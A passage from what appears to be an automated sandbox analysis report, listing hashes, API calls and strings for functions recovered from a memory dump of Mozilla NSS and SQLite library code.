Opcode ID: 4ec0e6be421562b9b474a89af2772340f27a44749245dda12e863d7b93a2c5c1
Instruction ID: 19155fa3e0ab98661b77b666267e0936a0d5131468da5052933de2bb33981436
Opcode Fuzzy Hash: 4ec0e6be421562b9b474a89af2772340f27a44749245dda12e863d7b93a2c5c1
Instruction Fuzzy Hash: 2111E4B9900B859BEF209F29CA8475777B8BB41358F58552AD81683E10EB32F498C7A1

Function 6CA98FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6CAA0710), ref: 6CA98FF1
PR_CallOnce.NSS3(6CBE2158,6CA99150,00000000,?,?,?,6CA99138,?,6CAA0710), ref: 6CA99029
calloc.MOZGLUE(00000001,00000000,?,?,6CAA0710), ref: 6CA9904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6CAA0710), ref: 6CA99066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6CAA0710), ref: 6CA99078

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: 11a0e3844bdf313c7e0704612b7e3a3697a99a7bbe9eb8c5cf4276e800bc3093
Instruction ID: 563c5262300adefbda661335a340b7923ad4b57aa1401acdf3898c88620aa489
Opcode Fuzzy Hash: 11a0e3844bdf313c7e0704612b7e3a3697a99a7bbe9eb8c5cf4276e800bc3093
Instruction Fuzzy Hash: 7411C6217101516EEB2016B9AD45A6A37ECEB82BACF540131FC5CC6A41F753C9C593A2

Function 6CB104C0 Relevance: 7.6, APIs: 5, Instructions: 63synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6CB1461B,-00000004), ref: 6CB104DF
TlsGetValue.KERNEL32(?,00000000,?,6CB1461B,-00000004), ref: 6CB10510
EnterCriticalSection.KERNEL32(ED850FDC), ref: 6CB10520
PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6CB1461B,-00000004), ref: 6CB10534
GetLastError.KERNEL32(?,6CB1461B,-00000004), ref: 6CB10543

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
String ID:
API String ID: 3052423345-0
Opcode ID: 13fe0205e65436634ec48b6eb1712feeb2b55a6978d93fc0167e9fd9817e3a15
Instruction ID: 55a2fb01bbe3785e2c22290f2bbce0ce477c98d89dbc7b7d561e33941bb92e1a
Opcode Fuzzy Hash: 13fe0205e65436634ec48b6eb1712feeb2b55a6978d93fc0167e9fd9817e3a15
Instruction Fuzzy Hash: 39112B71A081C59BDB006E38BC54B6A3764EF02319F644624E429C7D91EF31E964C792

Function 6CB14AF0 Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

PR_MemUnmap.NSS3(00015180,00000005,?,6CB14AD1), ref: 6CB14B62
free.MOZGLUE(?,00015180,00000005,?,6CB14AD1), ref: 6CB14B76

Part of subcall function 6CB103C0: CloseHandle.KERNEL32(?,?,?,?,6CB14B27,?,?,00015180,00000005,?,6CB14AD1), ref: 6CB103E0
Part of subcall function 6CB103C0: GetLastError.KERNEL32(?,6CB14B27,?,?,00015180,00000005,?,6CB14AD1), ref: 6CB103FD

Part of subcall function 6CB103C0: DeleteCriticalSection.KERNEL32(00000005,?,?,?,6CB14B27,?,?,00015180,00000005,?,6CB14AD1), ref: 6CB10419
Part of subcall function 6CB103C0: free.MOZGLUE(?,?,6CB14B27,?,?,00015180,00000005,?,6CB14AD1), ref: 6CB10420

CloseHandle.KERNEL32(?,00015180,00000005,?,6CB14AD1), ref: 6CB14B96
free.MOZGLUE(?,?,6CB14AD1), ref: 6CB14B9D
memset.VCRUNTIME140(6CBE2F9C,00000000,00000090,00015180,00000005,?,6CB14AD1), ref: 6CB14BB2

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: free$CloseHandle$CriticalDeleteErrorLastSectionUnmapmemset
String ID:
API String ID: 447902086-0
Opcode ID: c2c14d91dcd04b46b0f76cbf36043c9f409e5ed5981d780698c4dac003b8b559
Instruction ID: 59a4326d0b597fe530b0dc1729dc883ab85701d333c75ce92fae3613ca24c402
Opcode Fuzzy Hash: c2c14d91dcd04b46b0f76cbf36043c9f409e5ed5981d780698c4dac003b8b559
Instruction Fuzzy Hash: BC110472B01590ABDE209B94DC05B4B7738FB0ABACF040024F50953E62D331A659CBE3

Function 6CAACD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6CAC1E10: TlsGetValue.KERNEL32 ref: 6CAC1E36
Part of subcall function 6CAC1E10: EnterCriticalSection.KERNEL32(?,?,?,6CA9B1EE,2404110F,?,?), ref: 6CAC1E4B
Part of subcall function 6CAC1E10: PR_Unlock.NSS3 ref: 6CAC1E76

free.MOZGLUE(?,6CAAD079,00000000,00000001), ref: 6CAACDA5
PK11_FreeSymKey.NSS3(?,6CAAD079,00000000,00000001), ref: 6CAACDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CAAD079,00000000,00000001), ref: 6CAACDCF
DeleteCriticalSection.KERNEL32(?,6CAAD079,00000000,00000001), ref: 6CAACDE2
free.MOZGLUE(?), ref: 6CAACDE9

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 0935472cd409ed5119f900e3ee63771ea2845d95c1fc97499e2b6f2358e4ff14
Instruction ID: 984df8885098479fbd0c2b975853e4f7df6e3b74d85f381b47276a1e37d57128
Opcode Fuzzy Hash: 0935472cd409ed5119f900e3ee63771ea2845d95c1fc97499e2b6f2358e4ff14
Instruction Fuzzy Hash: 7C11C2B6B01215ABEB00AEA5EC44A96B77CFF0425C7180121E91987E01E732F4A9C7E1

Function 6CB12CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CB15B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB15B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB12CEC

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

PR_EnterMonitor.NSS3(?), ref: 6CB12D02
PR_EnterMonitor.NSS3(?), ref: 6CB12D1F
PR_ExitMonitor.NSS3(?), ref: 6CB12D42
PR_ExitMonitor.NSS3(?), ref: 6CB12D5B

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 6264cca88fdcea4d85f6f28237aa46aad5d9764f55a75f1b6f9ee7d9a0a5e44e
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: A101C8B19182905BE7309F25FC40BCBB7B5EF46318F004525E85D86F10D632F5159793

Function 6CB12D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CB15B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB15B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB12D9C

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

PR_EnterMonitor.NSS3(?), ref: 6CB12DB2
PR_EnterMonitor.NSS3(?), ref: 6CB12DCF
PR_ExitMonitor.NSS3(?), ref: 6CB12DF2
PR_ExitMonitor.NSS3(?), ref: 6CB12E0B

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 7a3575adbdc8672f9f7a19716512b35ce79e83ac8cb9c4a7643d8233ac530e9b
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 5B01A5B69182949BE7309E25FC01BCBB7A5EB42318F004435E85D86F11D632F5159693

Function 6CAAAE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6CA93090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAAAE42), ref: 6CA930AA
Part of subcall function 6CA93090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CA930C7
Part of subcall function 6CA93090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CA930E5
Part of subcall function 6CA93090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA93116
Part of subcall function 6CA93090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA9312B
Part of subcall function 6CA93090: PK11_DestroyObject.NSS3(?,?), ref: 6CA93154
Part of subcall function 6CA93090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA9317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6CA899FF,?,?,?,?,?,?,?,?,?,6CA82D6B,?), ref: 6CAAAE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6CA899FF,?,?,?,?,?,?,?,?,?,6CA82D6B,?), ref: 6CAAAE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CA82D6B,?,?,00000000), ref: 6CAAAE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CA82D6B,?,?,00000000), ref: 6CAAAE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6CA82D6B,?,?), ref: 6CAAAEA3

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 2cccccd6223c19856226970ec0794e17c18409be851e144f9da2ec207505faf9
Instruction ID: 458178b2768c5781f46d02ef5370a06d112f6cf7379f77a323277a74d0d21f54
Opcode Fuzzy Hash: 2cccccd6223c19856226970ec0794e17c18409be851e144f9da2ec207505faf9
Instruction Fuzzy Hash: E701F9B2B1113057E71152ECAD86A9F31E98B8765DF0C0032E809C7B01F611DDCA4AE3

Function 6CB249C0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(000A2CD6,00000000,00000000,00000678,?,?,6CB15F34,00000A20), ref: 6CB249EC

Part of subcall function 6CADFAB0: free.MOZGLUE(?,-00000001,?,?,6CA7F673,00000000,00000000), ref: 6CADFAC7

SECITEM_ZfreeItem_Util.NSS3(000A2CEA,00000000,6CB15F34,00000A20,?,?,?,?,?,?,?,?,?,6CB1AAD4), ref: 6CB249F9
SECITEM_ZfreeItem_Util.NSS3(000A2CBE,00000000,?,?,6CB15F34,00000A20,?,?,?,?,?,?,?,?,?,6CB1AAD4), ref: 6CB24A06
free.MOZGLUE(?,?,?,?,?,6CB15F34,00000A20), ref: 6CB24A16
free.MOZGLUE(000A2CB6,?,?,?,?,6CB15F34,00000A20), ref: 6CB24A1C

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Item_UtilZfreefree
String ID:
API String ID: 2193358613-0
Opcode ID: dd2e5f6aa303053bc43627974ec69783d7f7025b432cd295c90577023aed021d
Instruction ID: 1aca9f7169def348228882672666d9f6189b9ae79d7561559b4fc8d88c4197ad
Opcode Fuzzy Hash: dd2e5f6aa303053bc43627974ec69783d7f7025b432cd295c90577023aed021d
Instruction Fuzzy Hash: F5015E769001149FCB00DF69DCC4C977BBCEF8A24834980A5E909CB711E731E948CBA1

Function 6CB90930 Relevance: 7.5, APIs: 5, Instructions: 45fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,6CB90C83), ref: 6CB9094F
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6CB90C83), ref: 6CB90974
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90983
_PR_MD_UNLOCK.NSS3(?,?,6CB90C83), ref: 6CB9099F
OutputDebugStringA.KERNEL32(?,?,6CB90C83), ref: 6CB909B2

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalDebugEnterOutputSectionStringfflushfwrite
String ID:
API String ID: 1872382454-0
Opcode ID: be01e4727e2d213f8d0d9da667f2ca3f8c924e162211e7704a47c6df28377796
Instruction ID: 186dca51dc2b00bce2bb656610a1ebfd11d832902ce5b0c04eb629dea705935f
Opcode Fuzzy Hash: be01e4727e2d213f8d0d9da667f2ca3f8c924e162211e7704a47c6df28377796
Instruction Fuzzy Hash: C5012DB47012809FDF40AF68DC55B593BB8AB8FB9AF2C0225F44593753D775E490CA11

Function 6CB92A40 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CB92A5B
free.MOZGLUE(?), ref: 6CB92A6D
strdup.MOZGLUE(?), ref: 6CB92A7B
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CB92A96
PR_ExitMonitor.NSS3 ref: 6CB92AB5

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Monitor$EnterErrorExitfreestrdup
String ID:
API String ID: 1948362043-0
Opcode ID: 8dd6b023d50949b036689183f9406ee6ece318110536a0de381e9a9e663b793a
Instruction ID: 240f5ae9e52c02aa12484cd3d64e0b5ecdfc9e031e1ac6fe26628903fb167fd8
Opcode Fuzzy Hash: 8dd6b023d50949b036689183f9406ee6ece318110536a0de381e9a9e663b793a
Instruction Fuzzy Hash: 15F0A976F041A49BEE60AF64DC0974A7739AB07BC8F1A4130D80997A06E731D518C7D3

Function 6CB9ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6CB9A6D8), ref: 6CB9AE0D
free.MOZGLUE(?), ref: 6CB9AE14
DeleteCriticalSection.KERNEL32(6CB9A6D8), ref: 6CB9AE36
free.MOZGLUE(?), ref: 6CB9AE3D
free.MOZGLUE(00000000,00000000,?,?,6CB9A6D8), ref: 6CB9AE47

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 7c1d763634eb59e07f4549d1d0f94a64dea626eec2ebe0e50d2c57bed6b64dcc
Instruction ID: 05271c8858f6401afea85ef186e8c61f28b1ddc8689cf582f4603fadbb99b27a
Opcode Fuzzy Hash: 7c1d763634eb59e07f4549d1d0f94a64dea626eec2ebe0e50d2c57bed6b64dcc
Instruction Fuzzy Hash: 4CF09675601E05A7CA119FA8D818957777CFF8A7757240328E52A83940D731F115CBD6

Function 6CB52B20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00020C24,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB52B64

Strings

misuse, xrefs: 6CB52B58
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB52B4E
%s at line %d of [%.10s], xrefs: 6CB52B5D

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 632333372-648709467
Opcode ID: d09ed3f376d2402722404797e1b3949ad92846dbd5acbc9c6f72028da09c1b67
Instruction ID: b0d99ecfdb412f1dc5207bd7ad51bd1b5564b94bd6fbac2f398352f9ebcfc562
Opcode Fuzzy Hash: d09ed3f376d2402722404797e1b3949ad92846dbd5acbc9c6f72028da09c1b67
Instruction Fuzzy Hash: 41511671F062864BEB04CFA888857EEB7A2EF49318F984229C815DBB42D731D855C793

Function 6CA14AC0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000B2F5), ref: 6CA14C2B

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6CA14C24
winWrite1, xrefs: 6CA14BC2
winWrite2, xrefs: 6CA14C01

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winWrite1$winWrite2
API String ID: 632333372-1808655853
Opcode ID: 51a51207315376960b74ddc123fa0074a3e711777103a3c744e3ae456b996a5a
Instruction ID: 8646a6fded0683739c9ea4912e2127cd0c8ab9e2fcc8e7e2da09d8003966166a
Opcode Fuzzy Hash: 51a51207315376960b74ddc123fa0074a3e711777103a3c744e3ae456b996a5a
Instruction Fuzzy Hash: 1841C275B083469BD704CF19C850A5EB7F9EF88368F148A29F8588BB90D730DA458B82

Function 6CA16C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CA16D36

Strings

database corruption, xrefs: 6CA16D2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA16D20
%s at line %d of [%.10s], xrefs: 6CA16D2F

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
